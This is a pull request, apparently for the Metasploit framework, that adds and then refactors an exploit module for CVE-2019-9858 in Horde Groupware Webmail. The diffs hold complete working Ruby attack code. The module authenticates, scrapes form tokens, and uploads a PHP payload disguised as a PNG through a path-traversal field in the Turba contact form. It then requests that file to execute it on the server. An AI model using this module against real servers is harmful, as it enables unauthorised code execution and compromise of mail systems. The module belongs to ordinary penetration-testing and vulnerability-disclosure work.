### PR TITLE
Add Horde Turba File Upload exploit

### DIFF
--- a/modules/exploits/multi/http/horde_turba_file_upload.rb
+++ b/modules/exploits/multi/http/horde_turba_file_upload.rb
@@ -1,0 +1,182 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Horde Turba File Upload Vulnerability',
+      'Description'     => %q{
+          Horde Groupware Webmail contains a flaw that allows an authenticated remote
+          attacker to execute arbitrary PHP code. The exploitation requires the Turba
+          subcomponent to be installed. This module was tested on versions 5.2.22 and 5.2.17.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Ratiosec',
+        ],
+      'References'      =>
+        [
+                    ['CVE', '2019-9858'],
+                    ['URL', 'https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/'],
+        ],
+      'DisclosureDate'  => 'Mar 24 2019',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [
+    ['Automatic', { }],
+    ['PEAR', { 'path': '/var/www/html/'}],
+    ['Ubuntu', { 'path': '/usr/share/horde/' }],
+    ],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
+        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
+      ])
+  end
+
+  def check
+    vprint_status("Authenticating using #{username}:#{password}")
+    cookie = horde_login(username, password)
+    return Exploit::CheckCode::Unknown unless cookie
+
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, '/turba/add.php'),
+      'cookie'      => cookie
+    )
+
+    if res && res.code == 200
+    if res.body.include?('Groupware 5.2.22') || res.body.include?('Groupware 5.2.17')
+    return Exploit::CheckCode::Vulnerable
+      end
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def horde_login(user, pass)
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, 'login.php')
+    )
+
+    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+
+    session_cookie = res.get_cookies
+    vprint_status("Logging in...")
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri, 'login.php'),
+      'cookie'      => session_cookie,
+      'vars_post'   => {
+        'horde_user'  => user,
+        'horde_pass'  => pass,
+        'login_post'    => '1'
+      }
+    )
+
+    return res.get_cookies if res && res.code == 302
+    nil
+  end
+
+  def get_tokens(cookie)
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri, 'turba', 'add.php'),
+      'cookie'      => cookie
+    )
+
+    if res && res.code == 200
+      if res.body.scan /turba\/add\.php\?source=(.+)"/
+          source_token = Regexp.last_match.to_a[1..-1].find{|x| x != "favourites" }
+
+      if res.body =~ /name="turba_form_addcontact_formToken" value="(.+)"/
+        form_token = Regexp.last_match[1]
+        return source_token, form_token, res.get_cookies
+      end
+      end
+    end
+    nil
+  end
+
+  def exploit
+    vprint_status("Authenticating using #{username}:#{password}")
+
+    cookie = horde_login(username, password)
+    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
+    vprint_good("Authenticated to Horde.")
+
+    tokens = get_tokens(cookie)
+    fail_with(Failure::Unknown, 'Error extracting tokens.') if tokens.nil?
+    source_token, form_token, secret_cookie = tokens
+
+    vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
+
+    targets[1..-1].each do |curr_target|
+
+    if target.name =~ /Automatic/ or curr_target == target
+
+      payload_name = Rex::Text.rand_text_alpha_lower(10)
+      payload_path = File.join(curr_target[:path], "static", "#{payload_name}.php")
+      payload_path_traversal = File.join("..", payload_path)
+
+      vprint_status("Preparing payload for target #{curr_target.name}...")
+
+      data = Rex::MIME::Message.new
+      data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
+      data.add_part("turba_form_addcontact", nil, nil, 'form-data; name="formname"')
+      data.add_part(form_token, nil, nil, 'form-data; name="turba_form_addcontact_formToken"')
+      data.add_part(source_token, nil, nil, 'form-data; name="source"')
+      data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
+      post_data = data.to_s
+
+      vprint_status("Uploading payload to #{payload_path_traversal}")
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri, 'turba', 'add.php'),
+        'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+        'data'      => post_data,
+        'cookie'    => cookie + ' ' + secret_cookie
+      )
+
+      fail_with(Failure::Unknown, "Unable to upload payload to #{payload_path_traversal}.") unless res && res.code == 200
+
+      payload_url = normalize_uri(target_uri, 'static', "#{payload_name}.php")
+
+      vprint_status("Executing the payload at #{payload_url}.")
+      res = send_request_cgi(
+        'uri'     => payload_url,
+        'method'  => 'GET'
+      )
+
+      if res and res.code != 200
+        vprint_bad("URL #{payload_url} hasn't been created or is not callable")
+      else
+        register_files_for_cleanup(payload_path)
+        break
+      end
+    end
+   end
+  end
+end

--- a/modules/exploits/multi/http/horde_turba_file_upload.rb
+++ b/modules/exploits/multi/http/horde_turba_file_upload.rb
@@ -16,7 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'     => %q{
           Horde Groupware Webmail contains a flaw that allows an authenticated remote
           attacker to execute arbitrary PHP code. The exploitation requires the Turba
-          subcomponent to be installed. This module was tested on versions 5.2.22 and 5.2.17.
+          subcomponent to be installed. 
+
+          This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent < 2.0.19.
         },
       'License'         => MSF_LICENSE,
       'Author'          =>
@@ -25,17 +27,16 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'      =>
         [
-                    ['CVE', '2019-9858'],
-                    ['URL', 'https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/'],
+          ['CVE', '2019-9858'],
+          ['URL', 'https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/'],
         ],
       'DisclosureDate'  => 'Mar 24 2019',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
-      'Targets'         => [
-    ['Automatic', { }],
-    ['PEAR', { 'path': '/var/www/html/'}],
-    ['Ubuntu', { 'path': '/usr/share/horde/' }],
-    ],
+      'Targets'         => 
+        [
+          ['Automatic', { }],
+        ],
       'DefaultTarget'   => 0
     ))
 
@@ -43,28 +44,9 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
         OptString.new('USERNAME',   [true, 'The username to authenticate with']),
-        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
+        OptString.new('PASSWORD',   [true, 'The password to authenticate with']),
+        OptString.new('WEB_ROOT',   [false, 'Path to the web root'])
       ])
-  end
-
-  def check
-    vprint_status("Authenticating using #{username}:#{password}")
-    cookie = horde_login(username, password)
-    return Exploit::CheckCode::Unknown unless cookie
-
-    res = send_request_cgi(
-      'method'      => 'GET',
-      'uri'         => normalize_uri(target_uri, '/turba/add.php'),
-      'cookie'      => cookie
-    )
-
-    if res && res.code == 200
-    if res.body.include?('Groupware 5.2.22') || res.body.include?('Groupware 5.2.17')
-    return Exploit::CheckCode::Vulnerable
-      end
-      return Exploit::CheckCode::Appears
-    end
-    Exploit::CheckCode::Safe
   end
 
   def username
@@ -73,6 +55,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def password
     datastore['PASSWORD']
+  end
+
+  def webroot
+    datastore['WEB_ROOT']
   end
 
   def horde_login(user, pass)
@@ -97,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     return res.get_cookies if res && res.code == 302
-    nil
+    []
   end
 
   def get_tokens(cookie)
@@ -108,13 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.code == 200
-      if res.body.scan /turba\/add\.php\?source=(.+)"/
-          source_token = Regexp.last_match.to_a[1..-1].find{|x| x != "favourites" }
-
-      if res.body =~ /name="turba_form_addcontact_formToken" value="(.+)"/
-        form_token = Regexp.last_match[1]
-        return source_token, form_token, res.get_cookies
-      end
+      source_tokens = res.body.scan(/turba\/add\.php\?source=(.+)"/).flatten
+      if source_tokens
+        form_tokens = res.body.scan(/name="turba_form_addcontact_formToken" value="(.+)"/).flatten
+        return source_tokens[0], form_tokens[0], res.get_cookies
       end
     end
     nil
@@ -133,15 +116,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
 
-    targets[1..-1].each do |curr_target|
+    if not webroot
+      webroot_paths = [
+        '/var/www/html/',   # If installed with PEAR
+        '/usr/share/horde/' # If installed with apt
+      ]
+    else
+      webroot_paths = [ webroot ]
+    end
 
-    if target.name =~ /Automatic/ or curr_target == target
+    for webroot_path in webroot_paths
 
-      payload_name = Rex::Text.rand_text_alpha_lower(10)
-      payload_path = File.join(curr_target[:path], "static", "#{payload_name}.php")
+      payload_name = Rex::Text.rand_text_alpha_lower(10..12)
+      payload_path = File.join(webroot_path, "static", "#{payload_name}.php")
       payload_path_traversal = File.join("..", payload_path)
-
-      vprint_status("Preparing payload for target #{curr_target.name}...")
 
       data = Rex::MIME::Message.new
       data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"object[photo][new]\"; filename=\"#{payload_name}.png\"")
@@ -151,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data.add_part(payload_path_traversal, nil, nil, 'form-data; name="object[photo][img][file]"')
       post_data = data.to_s
 
-      vprint_status("Uploading payload to #{payload_path_traversal}")
+      print_status("Uploading payload to #{payload_path_traversal}")
       res = send_request_cgi(
         'method'    => 'POST',
         'uri'       => normalize_uri(target_uri, 'turba', 'add.php'),
@@ -170,13 +158,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'method'  => 'GET'
       )
 
-      if res and res.code != 200
-        vprint_bad("URL #{payload_url} hasn't been created or is not callable")
-      else
+      if res and res.code == 200
         register_files_for_cleanup(payload_path)
-        break
+	break
+      else
+        vprint_bad("URL #{payload_url} hasn't been created or is not callable")
       end
     end
-   end
   end
 end


### PR DESCRIPTION
An arbitrary file write vulnerability that leads to remote code execution exists in Horde Groupware Webmail.

This can be exploited by an authenticated, unprivileged user to create a malicious PHP file under the Horde web root and gain arbitrary code execution on the server.

The vulnerability is located in the core Horde source code and has been proven exploitable with the installed default Turba address book component.

This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent < 2.0.19. Other versions may also be affected.

Disclosed via [SSD](https://ssd-disclosure.com/index.php/archives/3814).

